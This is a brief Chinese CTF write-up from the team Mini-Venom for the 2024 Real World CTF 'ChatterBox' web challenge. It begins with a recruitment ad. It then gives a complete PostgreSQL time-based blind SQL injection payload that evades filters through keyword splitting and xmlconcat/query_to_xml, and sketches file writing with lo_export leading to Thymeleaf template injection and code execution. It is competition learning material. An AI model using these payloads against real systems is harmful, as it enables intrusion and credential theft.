2024RWCTF WriteUp By Mini-Venom

招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱admin@chamd5.org(带上简历和想加入的小组WebChatterBox整体思路就是sql注入然后通过任意文件包含来打thymeleaf的SSTI。 第一步：pgsql时间盲注，似乎没有办法bool盲注因为回显的都一样，所以对网络稳定性有较高要求。先过一层黑名单又过一层parser。 黑名单的话用xml_concat拼接绕过就行了，parser这里测试了很久。最终搓出来：h'||''||(xmlconcat('/',query_to_xml('sele'||'ct ca'||'se wh'||'en substr((sele'||'ct passwd from message_users),{str(i)},1)=chr(120) then p'||'g_sl'||'eep(3) else p'||'g_sl'||'eep(0) en'||'d',true,true,'')))||'1之后就摁爆。第二步：通过lo_export写模板文件。审计thymeleaf黑白名单不难找到可利用的类，通过加载任意XML即可RCE。 过滤尖括号，使用[[${1*1}]]绕过 ………………………………